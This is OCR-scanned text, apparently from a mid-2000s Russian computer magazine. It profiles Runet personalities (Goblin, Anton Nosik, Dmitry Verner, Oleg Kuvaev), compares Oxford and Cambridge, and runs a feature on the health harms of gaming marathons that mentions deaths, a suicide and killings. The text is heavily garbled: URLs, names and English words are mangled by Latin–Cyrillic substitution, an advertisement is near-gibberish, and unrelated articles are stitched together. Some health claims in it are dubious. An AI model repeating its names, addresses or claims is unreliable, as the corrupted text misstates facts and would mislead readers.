на популярном игровом сайте риаке.зрЬ.ги. Когда появился БТР, Дима 
стал вести там свой раздел «Тупичок Гоблина», где просто делился сво- 
ими мыслями об играх. В 1999 году раздел превратился в самостоятель- 
ный авторский ресурс орег.ги, который остается им до сих пор. 
Переводом фильмов Гоблин стал заниматься еще в 1995 году. К этому 
времени он уже ушел из милиции и пытался заняться бизнесом. Пере- 
воды стали своеобразным хобби, так как, по мнению Дмитрия, гнусавый 
голос и совершенно левые пересказы не вписывались в понятие «пра- 
вильный перевод». Первые работы делались на специальном видеомаг- 
нитофоне, но это был тот еще гемор. Появление компьютера восприня- 
лось как сказка: с ним все было проще, быстрее и эффективнее. Выпус- 
тив для друзей несколько фильмов в своем переводе и получив подде- 
ржку, Гоблин основал собственную студию переводов «Полный Пэ», 
состоящую из одного человека, и продолжил полюбившееся дело. 
Кроме этого, иногда встречаются моменты, понятные только американс- 
ким жителям. Всякие ссылки на известные в США передачи, специфич- 
ный для этой страны юмор. Разобраться во всем этом Гоблину помога- 
ют знакомые, которые живут в Америке. Фильмы от Гоблина известны 
тем, что в них нет цензуры. Если в картине в тачку какого-нибудь негра 
из Бруклина въехал американский «запор», то гневная тирада негра пе- 
реводится дословно и без обиняков. 

Очень популярным проектом Гоблина стала студия переводов «Божья иск- 
ра». Ее целью является не перевести смысл реплик как можно ближе к ори- 
гиналу, а, наоборот, извратить их так, чтобы это было смешно и близко 
сердцу русского человека. Родилась эта идея благодаря посетителям 
орег.ги, которые убедили любимого переводчика, что глупые фразы, заме- 
ненные на приколы, часто не только не вредят, но и идут фильму на поль- 
зу. «Нет в тебе Божьей искры, Гоблин, иначе ты бы это понял». Так появил- 
ся экспериментальный проект с теперь уже всем известным названием. По- 
мимо переводов фильмов Гоблин в свое время работал над локализацией 
компьютерных игрушек. Геймерам наверняка известны названия: «Горь- 
кий-18», «Серьезный Сэм: Второе пришествие», «Дюк Нюкем: Проект Ман- 
хэттен», «Фанаты», «Бумер. Сорванные башни». 



[Антон Носик] 

Антон Носик за свою жизнь успел побывать и врачом, и бизнесменом, и 
президентом компании ВатЫег. Но больше всего он известен как сетевой 
журналист, отец проекта «Вечерний Интернет». Писать для печатных из- 
даний Носик стал в 1990 году, после эмиграции в Израиль. Сначала — на 
английском, затем — на русском, в основном, об экономике страны. Пи- 
сал оперативно, много, и, несмотря на то, что его аналитические прогно- 
зы обычно не сбывались, автора любили и читали. В начале 90-х его да- 
же считали одним из самых популярных журналистов России. В 1995 го- 
ду Антон Носик вернулся в прессу после двухлетнего затишья и стал вес- 
ти новую рубрику «Наши Сети», которая знакомила читателей с Интерне- 
том. Эта тема тогда на постоянной основе никем не освещалась, поэтому 
вызвала интерес, к тому же Носик, уже восьмой год обитавший в Фидо, 
знал о сетях не понаслышке. Помимо писательской деятельности Антон 
пытался заняться электронной коммерцией, но в итоге из этого ничего не 
вышло: рунет тогда был слишком мал и не располагал к хорошему на нем 
заработку. 

Проект «Вечерний Интернет», который прославил автора на всю Сеть, 
стартовал 24 декабря 1 996 году. Это была обычная колонка на сайте, 
созданная для информационной поддержки компании «Ситилайн». Ан- 
тон рассказывал о событиях в рунете, новых ресурсах Сети, и, так как 
сам искренне этим интересовался, получалось у него отлично. 
Особенностью ВИ было то, что обновлялся сайт ежедневно. Носик с неуто- 
мимым упорством выдавал по 20 килобайт в день, и адрес Шр://ѵі.сііу- 
Ііпе.ги/ѵі/сиггепі.Мт прописали стартовой страничкой в своих браузерах 
чуть ли не половина рунетчиков. С развитием Сети и появлением многочис- 
ленных ежедневных обозрений, ажиотаж вокруг «Вечернего Интернета» 
спал, хотя постоянные читатели продолжали на него традиционно заходить. 
Последний, 441 -й выпуск ВИ состоялся 25 апреля 1 999 года. 

Дальше Носик занимался активным продвижением Интернета через попу- 
лярные печатные СМИ. Под его именем выходили статьи в самых разных 
изданиях: от газеты «Московский Комсомолец» до компьютерных журна- 
лов. Тема всегда была та же — Сеть, компьютеры и все с этим связанное. 
В 1999 году Антон основал популярный новостной сайт Газета.ру, заняв в 
нем должность редактора. Помимо новостей в «Газете» публиковались 
серьезные аналитические материалы. Через какое-то время было принято 
решение новости и аналитику разделить, после чего появилось два новых 
проекта: новостная — іепіа.ги и аналитические — Ѵезіі.ги. После свалив- 
шихся на ВатЫег финансовых проблем, Антона Носика пригласили на пост 
президента компании. Как объяснил в интервью журналист, іепіа.ги и 
НатЫег.ги в свое время были приобретены крупным инвестором, после че- 
го деньги на поддержку обоих ресурсов стали сыпаться в количестве боль- 
шем, чем нужно. Несмотря на щедрость спонсоров, Лента.ру вышла на са- 
моокупаемость, в то время как Рамблер целиком зависел от финансового 
ручья. Когда тот иссяк, начались проблемы, решить которые и попросили 
редактора Ленты. 

Несмотря на то, что Антон сделал для рунета достаточно, чтобы с чистой 
совестью выйти на пенсию, отдыхать он не собирается. Недавно запустил 
два новых проекта: информационное агентство «Курсор» ііПр://сигзогіпІо.со.И 
и информационный сайт о событиях в России на английском языке 
шш.тозпеш.сот. Также он ведет дневник Шр://ІіѵеригпаІ.сот/~сІоІЬоеЬ — 
один из самых популярных в ЖЖ. 
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ЕСЛИ ТЫ ВНИМАТЕЛЬНО ЧИТАЕШЬ «ХАКЕР», ТО ДОЛЖЕН 
ХОРОШО ЗНАТЬ ОБ МТИ, МГУ И ДРУГИХ УЧЕБНЫХ И НАУЧ- 
НЫХ ЗАВЕДЕНИЯХ, О КОТОРЫХ Я УЖЕ РАССКАЗЫВАЛ. 
ИМЕННО ОНИ ВЫПУСКАЮТ В МИР ЛЮДЕЙ, КОТОРЫЕ ДЕЛА- 
ЮТ РЕВОЛЮЦИОННЫЕ КОМПЬЮТЕРНЫЕ ОТКРЫТИЯ, И ИМЕН- 
НО ВНУТРИ ИХ КАМПУСОВ ВЕДУТСЯ ВАЖНЫЕ ДЛЯ НАУЧНО- 
ГО МИРА ИССЛЕДОВАНИЯ. НАСТАЛА ПОРА РАССКАЗАТЬ ТЕ- 
БЕ О ВУЗАХ, КОТОРЫЕ ЯВЛЯЮТСЯ СТАРЕЙШИМИ И ПРЕС- 
ТИЖНЕЙШИМИ В ЕВРОПЕ И ВО ВСЕМ МИРЕ. С КАЖДЫМ ИЗ 
НИХ СВЯЗАНА СВОЯ ВЕКОВАЯ ИСТОРИЯ, ОБЪЕДИНЯЮЩАЯ 
ИХ ПРОТИВОСТОЯНИЕ, КОТОРОЕ ДЛИТСЯ С НЕЗАПАМЯТНЫХ 
ВРЕМЕН I тіпсІѵѵОгк (тіпсІѵѵОгк@датеІапсІ.ги) 



Рассказ о двух самых 
престижных вузах Европы 

[университет Оксфорда] Историки не смогли определить точ- 
ную дату его основания. Найдены доказательства того, что в нем 
преподавали еще в 1096 году, но тогда он больше напоминал не- 
большой колледж. В 1167 году король Англии Генри II запретил анг- 
лийским студентам учиться в Парижском университете — крупней- 
шем вузе старой Англии, и Оксфорд стал стремительно расти. Воз- 
можно, сыграло роль выгодное местоположение или хорошая репу- 
тация, так или иначе новый университет обустраивался и пополнял- 
ся новыми кампусами. В 1209 году на территории Оксфордского уни- 
верситета произошло изнасилование. Насильника найти так и не 
удалось, и горожане повесили в отместку троих его друзей. Этот слу- 
чай вызвал бурю протеста у студентов, которые покинули город Окс- 
форд и стали искать для себя новые учебные заведения. Академики, 



преподававшие там ранее, двинулись на северо-восток и основали 
новый университет в городе Кембридж. Несколько лет спустя, римс- 
кий кардинал Николас Романус, по просьбе жителей Оксфорда, об- 
ратился к студентам, призывая их вернуться и пообещав многочис- 
ленные льготы. Это подействовало, жизнь в университете вернулась 
в свое русло. До конца XIX века в университете были строгие огра- 
ничения на получение высшей степени. Так, степень бакалавра да- 
вали только тем, кто имел отношение к Английской Церкви, дисси- 
денты не могли получить степень выше МА, и для получения любой 
степени необходимо было хорошо знать древнегреческий язык и ла- 
тынь. Женщинам вообще не позволялось иметь научную степень 
вплоть до 1920 года. Сейчас все эти ограничения уже не актуальны. 
Университет Оксфорда находится в числе европейских вузов, в 
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[Дмитрий Вернер] 



[Олег Куваев] 



О Диме Вернере говорят так: «Он научил смеяться рунет». На его 
сайт Шр://апексІо1.ги ежедневно заходят десятки тысяч людей, 
еще больше получат на мыло рассылку со свежими анекдотами, 
афоризмами и историями. Считается, что на этом ресурсе дол- 
жен побывать хоть раз каждый уважающий себя рунетчик. Ведь 
анекдот.ру — это не просто сборник анекдотов, а целое сообще- 
ство любителей позитивного настроения. 

Родился Дмитрий 20 июля 1959 года в Ленинграде. Получив 
специальность астронома в ЛГУ и отслужив в армии, стал рабо- 
тать в институте, а в 1987 году стал кандидатом физико-техни- 
ческих наук. Дальнейшая жизнь была вплотную связана с раз- 
личными университетами, в основном американскими, где он 
проводил исследования и преподавал на контрактной основе. 
Благодаря матери, которая в 80-х годах работала программис- 
том, Дима стал одним из первых пользователей Интернета в 
России. Но долгое время использовал его в качестве рабочего 
инструмента, посещая тематические конференции по астрофи- 
зике, общаясь со своими коллегами и выкладывая на РТР науч- 
ные документы. В 1995 году Дмитрий Вернер, вдохновленный 
сайтом своего знакомого (это опять же был узкоспециализиро- 
ванный ресурс для астрофизиков), выучил язык НТМІ_ и загорел- 
ся идеей создать что-то на русском языке. Он был уже давним 
подписчиком конференции геісот.ііитог, но публикуемые там 
анекдоты постоянно повторялись, качество не фильтровалась и 
в целом конфа была полна мусора. Тогда Дима решил самосто- 
ятельно отбирать лучшие «анеки» и выкладывать их на сайте в 
виде ежедневных выпусков. Так, 7 ноября 1995 года появились 
«Анекдоты из России» — первый ежедневно обновляемый ре- 
сурс в истории рунета. Читателями его были приятели и знако- 
мые Димы, а количество посетителей не превышало десяти в 
день. Остальные люди стали узнавать о сайте из проекта «Рус- 
ская литература в Интернете», который стал первыми Желтыми 
Страницами рунета, и в котором автор разместил ссылку на 
анекдоты Вернера. В конце 1996 года сайт переехал на «Черто- 
вы Кулички» — очень популярный в то время развлекательный 
портал. Там он обзавелся системой голосования, рейтингов и 
другими приятными фишками. А еще чуть позже получил посто- 
янный домен — апекбоГш. 

Проект Дмитрия Вернера уже много лет подряд занимает первое 
место в разделе «Юмор» рейтинга ВатЫег Тор 100. А несколько 
лет назад и вовсе был самым популярным и посещаемым сайтом 
рунета. В течение месяца почитать анекдоты заходит более 600 
тысяч людей со всех уголков мира, многие из постоянных читате- 
лей сами участвуют в пополнении, присылая свои шутки и весе- 
лые истории. Ресурс не стоит на месте и постепенно развивается. 
Одним из последних нововведений стал звуковой выпуск анекдо- 
тов, где они читаются голосом. Помимо анекдотов. ру Дима успе- 
вает поддерживать еще один популярный проект — «Супербизон» 
(на спортивную тематику). Там посетителям предлагается поуча- 
ствовать в соревновании по футбольным прогнозам. 



С фамилией Куваева имя Масяня ассоциируется так же прочно, к^ 
Масяня с Куваевым. А кто такая Масяня объяснять нашему человеку н 
нужно. Все началось осенью 2001 года, в небольшой питерской 
художественной мастерской, где Олег рисовал картины. Одним из 
увлечений художника было изучение языка РІазІі, на котором 
оказалось просто и увлекательно делать анимацию. После 
экспериментов со звуком Куваев решил попробовать создать мультик, 
и, чтобы не заморачиваться с деталями, набросок героини сделал, как 
в той песенке: «точка, точка, огуречик — получился человечек». Имя 
пришло на ум само — Масяня. Первые мультики про Масяню 
показал своим знакомым. Понравилось. Они, в свою очередь, кинУ 
ссылку другим знакомым, те — еще кому-то. Так о своенравн 
девочке из Питера начал потихоньку узнавать рунет. Мульты тог.і 
выкладывались на сайте Куваева, но, так как творение зарабатыва 
все больший успех, решили создать для нее новый дом. Так появился 
тиіі.ги. С ростом популярности Масяни в рунете, интерес к ней сЬ 
стороны толстосумов усиливался. Олегу стали сыпаться предложения 
о размещении баннеров, сомнительном финансировании, а однажды 
даже пришло письмо от МТѴ. Телевизионщики хотели попробовать 
дать мульты в эфир, но из-за пустяковых накладок эта затея тогда 
провалилась. Тем временем Куваева и сотрудницу Наташку из 
конторы, где они работали, за разгильдяйство выдворили, и, имея в 
кармане 500 рублей, ребята стали думать, как жить дальше. Так как у 
Олега в голове была одна Масяня, ему, конечно, хотелось совместить 
приятное с полезным. Но опять же, 500 рублей для открытия дела было 
явно недостаточно. С деньгами помог хороший знакомый, благодаря 
которому и был зарегистрирован ООО «Мульт.ру». Мульты Куваева 
выходили с завидной периодичностью, персонажа полюбили, и шквал 
посетителей на сайт каждую неделю вызывал перебои в его работе. 
Потом появился мульт «Экскурсия по Петербургу», вызвавший 
огромный скандал и обвинения в нападках на администрацию 
Питера. Эту историю крутили по телевидению, писали о ней в газетах, 
словом, пропиарили тиіі.ги дальше некуда. Были даже/ 
предположения, что Куваева специально купили. Другой 
скандал вызвало внедрение рекламы в мульты. Хотя автор 
объяснил: «Кушать хочется», зрители были не готовы 
воспринимать любимую героиню в качестве манекена для 
рекламирования штанов. Дело стало налаживаться в 2002 году, 
когда по инициативе самого Парфенова Масяня попала на НТВ. 
Злоключения Куваева и его героини на этом не закончились: 
после пары месяцев успешной трансляции началась длительная 
чехарда с авторскими правами, в результате которых Олег 
остался ни с чем. 2003 — 2004 года для Масяни были периодом 
депрессии. Новых мультов практически не выходило, имя и 
образ героини эксплуатировали все кому не лень: от 
телеканалов до производителей орешков. Вернуть все права на 
Масяню Олегу Куваеву удалось только в июле 2004 года, 
потрепав себе и поклонникам немало нервов. Но сейчас студия 
Мульт.ру возобновила свою работу, выпуская новые серии со 
старыми и новыми героями. 




"Ш.5У 



ѴѴ/ѴУ/ѴЛ/.РШ550ВІТ-М.РІІ 



Новая серия 
эротических квестов 
от "Руссобит-М"! 



Захватывающие 
приключения. 
( ) чаровател ты е 

девушки. 

Основной 

инстинкт. 






ШгЙПЯПЕКЕ® ЩрШЗ 8Щ!Щ§Ш,® 

[щриЕЕ 

йщсоа, ВсЩ^®[И^К, йЩ°Ч^Ь®=0=(аШіа 



2005 бате Расюгу Іптегастіѵе АН пдптз гезегѵеа. © 2005 иЬегатюп Зтиаіо . АН пдптз гезегѵеа 
продаж т:(095) 211-10-11, 967- 1 5-8 1 



ЩкІиХ^Х^Нс&П,- 

іс&\~ 



© 2005 "Руссобит 
е-таіТЯоШсе@гиз 5 рЩ 
Техническая подде ржка 
Фото: Наѵмш Дмитрии 





нов занимается «Комитет Синих», в который входят капитаны команд ос- 
новных видов спорта. Для студентов настолько важно участие и победа в 
соревнованиях Оксфорд-Кембридж, что некоторые даже готовы пожерт- 
вовать Олимпиадой, как, например, гребец Уэйн Поммен в 2004 году. 
Другим, не менее серьезным противостоянием, является борьба за ре- 
путацию «самого престижного». Споры и дискуссии на этот счет не 
умолкают ни на день последние несколько веков. Оксфорд является лю- 
бимчиком британской прессы, о нем пишут часто и много. В то же вре- 
мя в международном рейтинге университетов Кембридж стоит на вто- 
ром месте после Гарварда, в то время как Оксфорд — на десятом. 

На форумах все сходятся во мнении, что тем, кто хочет изучать точные 
науки (физика, математика), лучшим выбором будет Кембридж. У него 
выше финансирование научных исследований — это лучшее условия 
для будущих ученых. К тому же город Кембридж густо населен ІТ-ком- 
паниями, что позволит выпускнику легко найти высокооплачиваемую 
работу. Для тех, кто предпочитает гуманитарные науки, более удачным 
выбором будет Оксфорд. Хотя бы потому, что этот университет дал ми- 
ру больше писателей, поэтов и литераторов, чем любой другой. 

Как бы там ни было, оба вуза являются на одном уровне престижа в 
глазах работодателей, и окончание любого из них дает путевку в ин- 
тересную жизнь © 
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092 

Смерть 
во имя сети 

КОМПЬЮТЕР ЧЕЛОВЕКУ — ДРУГ. А ХАКЕРУ — 
ПОМОЩНИК, НЕЗАМЕНИМЫЙ ИНСТРУМЕНТ, И 
ВООБЩЕ, ЕГО ВТОРОЕ «Я». НО ПРОСИЖИВАЯ 
ЗА КОМПОМ СУТКИ НАПРОЛЕТ, МНОГИЕ ДАЖЕ 
НЕ ПОДОЗРЕВАЮТ, ЧЕМ ЭТО МОЖЕТ БЫТЬ 
ЧРЕВАТО. О ВОЗМОЖНЫХ ПОСЛЕДСТВИЯХ 
ДОЛГИХ КОМПЬЮТЕРНЫХ МАРАФОНОВ МЫ СЕ- 
ГОДНЯ И ПОГОВОРИМ I Илья Александров (Пуа_а1@гатЫег.ш) 



Куда уходят 
молодые годы? 

[жертвы компьютеров] Не спеши перевора- 
чивать страницу, ворча о том, что «бабушки- 
ных сказок» о вреде ПК ты можешь наслушать- 
ся и от папы с мамой. Потому что именно так 
думал Шон Вулли — американский парень, ра- 
ботавший в пиццерии, отличавшийся большой 
застенчивостью и страстной любовью к онлай- 
новой игре ЕѵегОиезІ. Настолько страстной, 
что сначала Вулли забил на учебу, все свобод- 
ное от работы время отдавая игре, а потом и 
пиццерию забросил. Играл он безотрывно с пе- 
рерывом на сон и еду, а чтобы иметь возмож- 
ность оплачивать игровое время (стоило это 
порядка 60 баксов в месяц), продавал из дома 
вещи и даже украл у матери кредитную карточ- 
ку. Родительнице все это надоело до такой сте- 
пени, что она выгнала несчастного геймера из 
дома, в надежде, что тот найдет себе работу и 
вернется в нормальный мир. Социальная служ- 



[зрение] 

Больше всего при работе за РС страдает 
твое зрение. Тебе наверняка знакомы сле- 
дующие симптомы: рези, жжения в глазах, 
затуманивание зрения, боль при движении 
глаз. Это так называемый «компьютерно- 
зрительный синдром». Он вызван тем, что 
изображение на экране монитора сильно 
отличается от естественного, оно по-друго- 
му светится, у него не такая, как у реальных 
объектов, резкость, находится на непривы- 
чном расстоянии. К тому же рабочее место 
обычно неправильно оборудовано и имеет 
недостаток освещения. При наборе текста 
глаза страдают оттого, что должны по- 
стоянно «перескакивать» с клавиатуры на 
экран, что влечет дополнительную нагруз- 
ку. Когда ты работаешь за компьютером, у 
глаза нет естественных фаз отдыха, он все 
время находится в напряжении. Ты можешь 
привести в пример телевизор, но при прос- 
мотре ТВ тебе не нужно напрягаться, раз- 
глядывая, какие там сережки у ведущей и 
какого цвета часы у героя фильма. 

К чему это ведет? Сначала — просто ди- 
скомфорт, боль в глазах. Потом — близо- 




ба устроила Шона работать носильщиком, предоставила комнату, жизнь 
постепенно стала налаживаться. Но как только Вулли скопил денег на 
подержанный компьютер, он вновь влился в онлайновый мир от Зопу. 
Как потом оказалось, в последний раз Шон играл 8 дней подряд, а на 
день Благодарения мать обнаружила труп сына возле компьютерного 
стола. Рядом валялась винтовка 22-го калибра, посредством которой 
игроман отправил себя на тот свет. Психоаналитики уверили, что само- 
убийство произошло в результате нервного срыва — парень несколько 
суток находится в напряженном состоянии под воздействием событий 
в ЕѵегОиезІ, вдобавок почти ничего не ел и фактически не спал. 




рукость. Причем при постоянной работе за 
компьютером (каждый день не менее двух 
часов), близорукость прогрессирует по 
диоптрии в год! И это не заявления анти- 
глобалистов, а факт, который подтвердит 
любой офтальматолог (исходя из этого 
факта, я должен был ослепнуть пару лет 
назад — прим. тіпсІѵѵОгк). 



[монитор] 



тами, приятной цветовой гаммой, не ис- 
пользуй разрешения типа 1600x1200 — 
оно годится разве что для профессио- 
нальных дизайнеров. Уровень глаз дол- 
жен приходиться на центр или 2/3 от высо- 
ты дисплея, и, конечно, желательно пе- 
риодически делать перерыв. 



[сколиоз] 



Нормальный ЖК монитор с диагональю, как 
минимум, 17 дюймов практически мастхэв. 
ЭЛТ-моники дают излучение, мерцают, 
да и картинка в них менее качественная. 
Пересев на ЖК ты сразу почувствуешь 
разницу, так как глаза будут уставать 
намного меньше. 

Если ты по каким-то причинам остаешься 
поклонником ЭЛТ — выбери себе дорогую 
модель от серьезного производителя, со- 
ответствующую стандартам ТОО' 03. Твои 
глаза должны находится от монитора на 
расстоянии вытянутой руки — около 50 — 70 
сантиметров. Освещение должно быть 
достаточно сильным, лампы расположи 
так, чтобы свет падал с левой стороны. 
Старайся работать с нормальными шриф- 



Многие компьютерщики страдают искрив- 
лением осанки, и что куда опасней — ско- 
лиозом. А ведь с детства нам твердят — си- 
ди за столом ровно! И это тот случай, когда 
папы-мамы-бабушки правы... При длитель- 
ном сидение за компом происходит сдавли- 
вание грудной клетки. Легкие не могут ра- 
ботать полноценно, следовательно, клетки 
организма не получают необходимого ки- 
слорода. Отсюда головные боли, бледность 
лица и болезни, связанные с дыхательной 
системой. Поэтому позаботься о покупке 
нормального кресла и стола под рабочее 
место. Сходи в аптеку и накупи себе вита- 
минов группы В — твоему мозгу это 
необходимо (не факт — прим. Лозовского). 
Если ты заядлый оверклокер, то твоя ма- 
шина ревет, как взлетающий вертолет, а 



постоянный шум чреват нервными рас- 
стройствами. Вообще, используй свое вре- 
мя рационально. Не торчи за компом про- 
сто так: от многочасового сидения в ІВС и 
гамания в ѴѴогІсІ оі ѴѴагсгаГС толку немного 
(зато сколько удовольствия! — прим. 
тіпсІѵѵОгк). Если будешь выполнять все эти 
советы и рекомендации, то не будешь в 
расцвете лет ходить в толстенных очках, с 
кривой осанкой и расшатанными нервами. 
Да, забыл сказать, что от малоподвижности 
может начаться развиваться простатит. Те- 
бе нужна импотенция в 20 лет? 

На вере юзеров нередко пытаются зарабо- 
тать мошенники. Вспомнить только тюмен- 
ского экстрасенса, который «разработал» 
устройство, позволяющее полностью избе- 
жать воздействие компьютера на психику че- 
ловека. Устройство называется биоактива- 
тор. Как говорит создатель, достаточно при- 
кладывать карточку ко лбу через каждый час 
работы, и она «вернет в норму все функции 
головного мозга и восполнит кислородное го- 
лодание мозга от компьютерного излучения». 
Так сказать, аккумулятор биологической 
энергии, который продавался очень успешно. 




ОПОРА СЛИШКОМ 
НИЗКО — ТЫ 
ПРОГИБАЕШЬСЯ 
В КРЕСЛЕ 




« 




Житель Гонконга, семнадцатилетний Ли Пу Сан, онлайновым ММОВРО 
предпочитал ЭіаЫо 2. С ним произошел случай очень, похожий на первый, — 
подросток все свободное время проводил за игрушкой, спал не более 2-х ча- 
сов в сутки, и, в конце концов, его нашли около работающего РС в бессоз- 
нательном состоянии. Изо рта и ушей геймера шла кровь, он скончался по 
пути в больницу. Причина смерти — стресс и общее переутомление. 

Это еще что — из-за фанатизма к компьютерам некоторые не только 
гибнут сами, но и других убивают. Китаец Ку Чэнвей и его друг Жу Ка- 
оюань в одной популярной ММОВРО выиграли на двоих виртуальный 
меч. Поклонники сотЬаІз.ги знают, что виртуальное оружие можно тол- 



кнуть за вполне реальные бабки. Этим и воспользовался Жу, продав- 
ший меч на аукционе за 900$. Чэнвей, узнавший об этом, подал на прия- 
теля в суд, но там его заявление, понятное дело, отклонили. Тогда Чэн- 
вей решил сам расправиться с обидчиком, и, явившись к нему домой, 
всадил в грудь нож. Каюаню пытался убедить друга, что все деньги он 
вернет, но того это не остановило. На суде убийца не стал отрицать сво- 
ей вины, и, зная китайские законы, догадаться о мере наказания не со- 
ставляет большого труда. 

В свое время на мировых новостных ресурсах долго мусолили историю 
о двух подростках, расстрелявших в одной из американских школ учи- 
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теля и 12 одноклассников. Якобы до этого они переиграли в дум и обе- 
щали устроить нечто подобное в реальности. У мирового сообщества 
этот инцидент вызвал шок и кучу жарких дискуссий о необходимости 
ограничить уровень насилия в играх. 

Не только у американцев и азиатов едет башня после многочасовых ба- 
талий в Сети. В Тюмени семнадцатилетний парень забил своих родите- 
лей до смерти из-за того, что они не пускали его в компьютерный клуб. 
А в Екатеринбурге двенадцатилетний мальчик скончался от обширного 
инсульта после относительно небольшого (12 часов) геймерского мара- 
фона. Во время игры ему стало плохо, закружилась голова, но он был 
так увлечен, что оторвался от компа лишь когда его скрутил сильней- 
ший эпилептический припадок. 

Что ж, думаю, примеров хватит. Причин, по которым юзер превращается 
из «человека разумного» в «человека играющего», может быть несколь- 
ко. Это и неустроенность в жизни — в Сети ты богат, у тебя 
большие мышцы, несколько жизней, тебя боятся ведьмы, 
монстры и другие игроки. На время ты забываешь о реаль- 
ных неприятностях и повседневных заботах. Кому-то не хва- 
тает эмоций в реальной жизни, обычно игроманы — заком- 
плексованные, малообщительные люди. 

Человек становится геймером постепенно. Сначала пробу- 
ет «погаматься» от нечего делать или по совету друзей, со 
временем втягивается, и повседневные дела отходят на за- 
дний план. Находясь в реале, он рвется вернуться в мир 
шейдерного неба и интерактивных соседей. В конце он ста- 
новится бледным молодым человеком с красными глазами, 
сидящим круглосуточно за компьютером и говорящим толь- 
ко о драконах или эпических доспехах. Г рань, когда игры 
для забавы, позволяющие скоротать пару часиков после 
работы, становятся твоей новой жизнью, очень трудно уло- 
вить. Напрашивается связь между любителями одноруких 
бандитов и футбольных тотализаторов. Но если они теряют 
лишь деньги, ты можешь лишиться здоровья, а то и жизни. 

[антикомпьютерные движения] Для того чтобы убе- 
речь людей от компьютерной зависимости, в некоторых 
странах вводятся ограничения на пользованием компьюте- 



ѴѴогІсІ оі ѴѴагсгаК — 
самая популярная 
ММОРРО на 
сегодняшний день 



один из пейзажей 
знаменитой ѴѴоѴѴ 




Шон Вулли 



ром. Например, в Китае несовершеннолетним 
запрещено посещать интернет-кафе. Также 
подобные заведения запрещено размещать 
возле школ, а при работе в Сети нельзя заходить на сайты порнографи- 
ческой, азартно-игровой и политически «нехорошей» направленности. 
За нарушение любого из этих условий предусмотрен штраф в 1800 дол- 
ларов, что для Китая огромные деньги. Также в самой многочисленной 
стране собираются внедрить программы, которые будут контролировать 
время, проведенное за онлайновой игрой, и отрубать пользователя от 
Сети, если тот слишком увлечется. Я, правда, не совсем понимаю, как 
заставить сотни миллионов китайских юзеров установить эти утилиты, 
но, думаю, правительство разберется. 

Во многих странах запрещают жестокие стрелялки. В Германии, напри- 
мер, запретили ввоз игр Веіигп Іо сазііе ѴѴоІІепзІеіп и ІІпгеаІ ТоигпатепГ 
А Розіаі 2 был запрещен везде, где только можно. 

В Белгородской области по распоряжению губернатора принят закон 
о запрещении «распространения любых видов продукции, пропаган- 
дирующих насилие, агрессию и антиобщественное поведение». Есте- 
ственно, что наши любимые 30-шутеры попадают в эту категорию. 
Впрочем, чтобы заставить пиратов не продавать экшены, надо иско- 
ренить само пиратство, а это в наших условиях невозможно (и, чест- 
но говоря, слава Богу). А вот в компьютерных клубах молодежь еще 
долго не поиграет в Соипіег-Зігіке. 

В мире существуют даже целые антикомпьютерные движения, активи- 
стами которых обычно становятся родители детишек, сутками просижи- 
вающих за компом. В США и Китае проходили демонстрации с требова- 
нием принять меры против компьютерной лихорадки. Какие нормы ак- 
тивисты не уточнили, но результат потребовали однозначный — не дать 
детям утонуть в океане Интернета. 

Из русских движений вспоминается СИТЕ. Была такая тусовка людей, ко- 
торая продвигала в массы идеологию «ПК — сатанинское зло». Лидером 
движения был Александр Г агин, которого однажды пригласили на телепе- 
редачу «Национальный интерес» и он перед мил- 
лионами телезрителей разнес топором 386-ой 
писюк. Но если верить шш.есііопеі.ги, Гагиным 
являлся никто иной, как Иван Паровозов — один 
из крупнейших сетевых деятелей рунета, а само 
движение СИТЕ — не что иное, как стеб. Распра- 
вившись прилюдно с «порождением зла», Гагин- 
Паравозов вернулся домой и стал сочинять оче- 
редной обзор, посвященный сетевой жизни. 



игра, запрещенная 
во многих странах 
мира 




Ш МШіз І5 иШп Ьоиі 









НЕ ОГРАНИЧИВАЙ 
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* В нашем магазине 
вас ждет более 
1000 игр 
на ваш выбор 



* Постоянно 
обновляемый 
ассортимент 



* Товары от 
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производителей 
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Вредно, ру — тут 
объяснят, почему 
нельзя сидеть 
сутками за компом 



не доводи себя до 



в виртуальности 
ты можешь стать 



настоящим героем 



[можно ли считать меня нормальным?] Приветствую, Амиго! Это 
майндворк. Я смотрю, мой коллега тебя совсем запугал своими страшил- 
ками про навеки искалеченных юзеров, едва севших за компьютер. Хочу 
рассмотреть этот вопрос с другой стороны. Меня, пожалуй, смело можно 
отнести к тем самым жертвам компьютерной революции, так как за ком- 
пом я часто провожу больше времени, чем на свежем воздухе. Это не зна- 
чит, что у меня пудовые очки и 300 кило живого весу, да и длительное воз- 
держание от компов я переживаю вполне свободно, если есть чем занять- 
ся. Но круглосуточные сетевые марафоны мне не в диковинку. 

В одном научном журнале я читал интервью с психологом, который го- 
ворил, что основная проблема хардкорных компьютерщиков — «отсут- 
ствие нормального человеческого общения». Но ведь основная задача 
общения — обмен информации, и неважно, передаешь ты эту информа- 
цию голосом или по Сети. Для многих общаться в Сети намного проще, 
да и найти себе собеседника по душе несложно. 

Что касается эмоций, то многие цепляются за виртуальный мир имен- 
но потому, что он способен дать им больше эмоций, чем мир реаль- 
ный. Взять тот же ѴѴогІсІ оі ѴѴагсгаК, в который сам я играю уже почти 
год. Я прекрасно помню яркие моменты из риаллайфа, которые меня 
будоражили, но ни один из таких моментов не сравнится с чувством, 
когда после нескольких недель 
совместных со своей гильдией от- 
чаянных попыток убить сложного 
босса, у вас, наконец, это получа- 
ется. Или когда ты принимаешь 
участие в масштабной битве и 
чувствуешь себя частью истории, 
пусть даже виртуальной. Конечно, 
можно пойти на войну и узнать, 
что это такое на самом деле, но я 
не думаю, что там ты получишь 
позитивные эмоции. 

Что бы там ни говорили исследова- 
тели, но люди предпочитают вирту- 
альный мир реальному, потому что 
он интереснее. ММОВРО с каждым 
годом становятся все сложнее и 
масштабнее, возможности их ра- 
стут, и если раньше ты мог только 
тупо мочить монстров, то теперь ты 
можешь по-настоящему жить в та- 
ком мире, и всегда найдешь чем 
там заняться. Онлайновые игры 
постоянно развиваются, выпуска- 
ются патчи, аддоны, которые подо- 
гревают интерес. Ты все время от- 
крываешь для себя что-то новое, и 
стремление открыть что-то еще 
«подстегивает» тебя играть даль- 
ше и дальше. Со временем ты при- 




выкаешь к виртуаль- 
ному миру, начинаешь 
считать его своей нео- 
тъемлемой частью. Во 
многом тому виной — 
люди, с которыми ты 
успел познакомиться, 
подружиться, с кото- 
рыми прошел огонь, 
воду и медные трубы. 
Бросить игру — зна- 
чит никогда их больше 
не увидеть. 

Вспомни Сайфера из 
фильма «Матрица», 
как он сидел и раз- 
мышлял, что лучше 
— печальная дей- 
ствительность или сладкий мир грез. Так и 
